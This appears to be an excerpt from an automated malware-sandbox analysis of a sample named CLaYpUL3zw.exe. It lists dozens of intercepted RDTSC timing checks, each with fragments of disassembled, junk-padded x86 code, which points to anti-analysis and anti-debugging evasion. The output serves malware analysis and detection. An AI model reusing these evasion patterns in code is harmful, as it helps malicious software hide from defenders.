                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: EE2914 second address: EE2928 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push esi 0x00000006 jc 00007FA030CAD666h 0x0000000c pop esi 0x0000000d popad 0x0000000e push eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: EE2928 second address: EE292C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: EE292C second address: EE29EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jmp 00007FA030CAD671h 0x00000010 mov eax, dword ptr [eax] 0x00000012 jmp 00007FA030CAD674h 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b jnc 00007FA030CAD66Eh 0x00000021 pop eax 0x00000022 jmp 00007FA030CAD673h 0x00000027 push 00000003h 0x00000029 mov edi, dword ptr [ebp+122D344Bh] 0x0000002f push 00000000h 0x00000031 push 00000003h 0x00000033 mov edi, dword ptr [ebp+122D3928h] 0x00000039 push 86F0C23Ch 0x0000003e jbe 00007FA030CAD66Ch 0x00000044 pushad 0x00000045 push esi 0x00000046 pop esi 0x00000047 pushad 0x00000048 popad 0x00000049 popad 0x0000004a add dword ptr [esp], 390F3DC4h 0x00000051 push 00000000h 0x00000053 push edi 0x00000054 call 00007FA030CAD668h 0x00000059 pop edi 0x0000005a mov dword ptr [esp+04h], edi 0x0000005e add dword ptr [esp+04h], 00000015h 0x00000066 inc edi 0x00000067 push edi 0x00000068 ret 0x00000069 pop edi 0x0000006a ret 0x0000006b cld 0x0000006c lea ebx, dword ptr [ebp+1244C72Eh] 0x00000072 mov dword ptr [ebp+122D339Fh], eax 0x00000078 xchg eax, ebx 0x00000079 pushad 0x0000007a push eax 0x0000007b push edx 0x0000007c jmp 00007FA030CAD66Fh 0x00000081 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: EE29EB second address: EE29EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: EE29EF second address: EE29F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: EE29F9 second address: EE2A16 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA030F107A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007FA030F107ACh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: EE2A16 second address: EE2A1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: EE2A1B second address: EE2A20 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: EE2A60 second address: EE2A64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: EE2A64 second address: EE2A68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: EE2A68 second address: EE2AB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp], eax 0x0000000a mov esi, ecx 0x0000000c clc 0x0000000d push 00000000h 0x0000000f mov dword ptr [ebp+122D17C7h], esi 0x00000015 mov dh, 00h 0x00000017 call 00007FA030CAD669h 0x0000001c jbe 00007FA030CAD672h 0x00000022 push eax 0x00000023 pushad 0x00000024 jmp 00007FA030CAD672h 0x00000029 pushad 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: EE2AB1 second address: EE2ACB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FA030F107A6h 0x0000000a popad 0x0000000b popad 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 jl 00007FA030F107ACh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: EE2ACB second address: EE2ACF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: EE2ACF second address: EE2AE6 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA030F107A8h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e jg 00007FA030F107B4h 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: EE2AE6 second address: EE2AFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FA030CAD666h 0x0000000a popad 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 jp 00007FA030CAD666h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: EE2C07 second address: EE2C0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: EE2C0C second address: EE2CB3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA030CAD673h 0x00000008 jmp 00007FA030CAD66Eh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 jng 00007FA030CAD668h 0x00000018 push edi 0x00000019 pop edi 0x0000001a ja 00007FA030CAD668h 0x00000020 popad 0x00000021 nop 0x00000022 cld 0x00000023 push 00000000h 0x00000025 mov dword ptr [ebp+122D17DEh], eax 0x0000002b mov si, 439Ah 0x0000002f call 00007FA030CAD669h 0x00000034 pushad 0x00000035 jne 00007FA030CAD67Bh 0x0000003b pushad 0x0000003c pushad 0x0000003d popad 0x0000003e push edi 0x0000003f pop edi 0x00000040 popad 0x00000041 popad 0x00000042 push eax 0x00000043 jmp 00007FA030CAD677h 0x00000048 mov eax, dword ptr [esp+04h] 0x0000004c pushad 0x0000004d push eax 0x0000004e jmp 00007FA030CAD66Ch 0x00000053 pop eax 0x00000054 push eax 0x00000055 push edx 0x00000056 jnc 00007FA030CAD666h 0x0000005c rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: EE2CB3 second address: EE2D66 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a jg 00007FA030F107A8h 0x00000010 jmp 00007FA030F107B5h 0x00000015 popad 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a jnp 00007FA030F107B2h 0x00000020 jnl 00007FA030F107ACh 0x00000026 pop eax 0x00000027 mov di, DC40h 0x0000002b push 00000003h 0x0000002d mov esi, 1D858614h 0x00000032 push 00000000h 0x00000034 pushad 0x00000035 adc cl, 00000012h 0x00000038 jmp 00007FA030F107B4h 0x0000003d popad 0x0000003e push 00000003h 0x00000040 push 7D21264Bh 0x00000045 push ecx 0x00000046 pushad 0x00000047 pushad 0x00000048 popad 0x00000049 jmp 00007FA030F107B8h 0x0000004e popad 0x0000004f pop ecx 0x00000050 add dword ptr [esp], 42DED9B5h 0x00000057 jl 00007FA030F107ACh 0x0000005d mov dword ptr [ebp+122D24D5h], esi 0x00000063 lea ebx, dword ptr [ebp+1244C742h] 0x00000069 mov edi, 1CCFA1AAh 0x0000006e push eax 0x0000006f push eax 0x00000070 push edx 0x00000071 jnp 00007FA030F107A8h 0x00000077 pushad 0x00000078 popad 0x00000079 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: EE2D66 second address: EE2D6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F02B53 second address: F02B7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007FA030F107ACh 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007FA030F107B0h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F02B7A second address: F02BA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA030CAD679h 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c jnp 00007FA030CAD66Ch 0x00000012 jne 00007FA030CAD666h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F00B3B second address: F00B5E instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA030F107A8h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA030F107B7h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F00B5E second address: F00B6C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA030CAD66Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F01547 second address: F0154D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F0154D second address: F01551 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F01551 second address: F0155A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F016B1 second address: F016B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F016B9 second address: F016BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F016BD second address: F016E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA030CAD679h 0x00000007 jns 00007FA030CAD666h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F016E8 second address: F016FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA030F107B1h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F016FD second address: F0170D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FA030CAD666h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F0170D second address: F01717 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FA030F107A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F019D4 second address: F01A35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA030CAD672h 0x00000009 jmp 00007FA030CAD673h 0x0000000e popad 0x0000000f jns 00007FA030CAD682h 0x00000015 jmp 00007FA030CAD676h 0x0000001a jne 00007FA030CAD666h 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FA030CAD673h 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F01A35 second address: F01A76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FA030F107B6h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push ebx 0x0000000d pushad 0x0000000e jmp 00007FA030F107ACh 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007FA030F107B2h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F01BBE second address: F01BC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F01BC2 second address: F01BC8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: EF9B61 second address: EF9B67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: EF9B67 second address: EF9B6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: EF9B6E second address: EF9B73 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F022EA second address: F0230B instructions: 0x00000000 rdtsc 0x00000002 js 00007FA030F107B4h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F0230B second address: F0230F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F0230F second address: F02313 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F02313 second address: F0231E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: EF9B38 second address: EF9B3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: EF9B3C second address: EF9B61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FA030CAD678h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F05EBE second address: F05EC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F05EC3 second address: F05EC8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F05EC8 second address: F05F07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007FA030F107B7h 0x00000010 pushad 0x00000011 jo 00007FA030F107A6h 0x00000017 jnp 00007FA030F107A6h 0x0000001d popad 0x0000001e popad 0x0000001f mov eax, dword ptr [esp+04h] 0x00000023 push eax 0x00000024 push edx 0x00000025 jc 00007FA030F107A8h 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F05F07 second address: F05F50 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA030CAD674h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jnp 00007FA030CAD685h 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push ebx 0x00000018 push edi 0x00000019 pop edi 0x0000001a pop ebx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F0BF2E second address: F0BF33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F0BF33 second address: F0BF75 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FA030CAD66Ah 0x00000008 jmp 00007FA030CAD66Ah 0x0000000d pop edx 0x0000000e jmp 00007FA030CAD676h 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push edi 0x00000018 jmp 00007FA030CAD66Dh 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F0BF75 second address: F0BF88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FA030F107AAh 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F0BF88 second address: F0BF9E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA030CAD672h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F10455 second address: F10473 instructions: 0x00000000 rdtsc 0x00000002 js 00007FA030F107A6h 0x00000008 jmp 00007FA030F107ACh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 js 00007FA030F107A6h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F10A22 second address: F10A28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F10A28 second address: F10A2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F10A2E second address: F10A32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F127FC second address: F12800 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F12800 second address: F1284A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FA030CAD66Ch 0x0000000c popad 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 pushad 0x00000012 jmp 00007FA030CAD675h 0x00000017 je 00007FA030CAD671h 0x0000001d jmp 00007FA030CAD66Bh 0x00000022 popad 0x00000023 mov eax, dword ptr [eax] 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 jbe 00007FA030CAD666h 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F1284A second address: F12876 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA030F107B8h 0x0000000b popad 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 jo 00007FA030F107AEh 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F12C38 second address: F12C3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F12DF9 second address: F12DFF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F12DFF second address: F12E10 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push edx 0x0000000f pop edx 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F13795 second address: F1379A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F1396F second address: F13973 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F13973 second address: F13979 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F13A51 second address: F13A6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA030CAD675h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F13A6A second address: F13A7D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jbe 00007FA030F107B4h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F13A7D second address: F13A81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F13FCE second address: F13FD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F1592A second address: F1598E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA030CAD673h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FA030CAD677h 0x0000000f nop 0x00000010 jmp 00007FA030CAD66Dh 0x00000015 push 00000000h 0x00000017 mov edi, dword ptr [ebp+122D3B94h] 0x0000001d push 00000000h 0x0000001f sub di, DBC8h 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007FA030CAD673h 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F1598E second address: F15994 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F15994 second address: F159B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA030CAD678h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F16302 second address: F16307 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F1829E second address: F182C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA030CAD674h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d jmp 00007FA030CAD66Ah 0x00000012 pop ebx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F17FBD second address: F17FC2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F18D5A second address: F18D5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F18D5E second address: F18D64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F18D64 second address: F18D75 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA030CAD66Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F18AD6 second address: F18ADA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
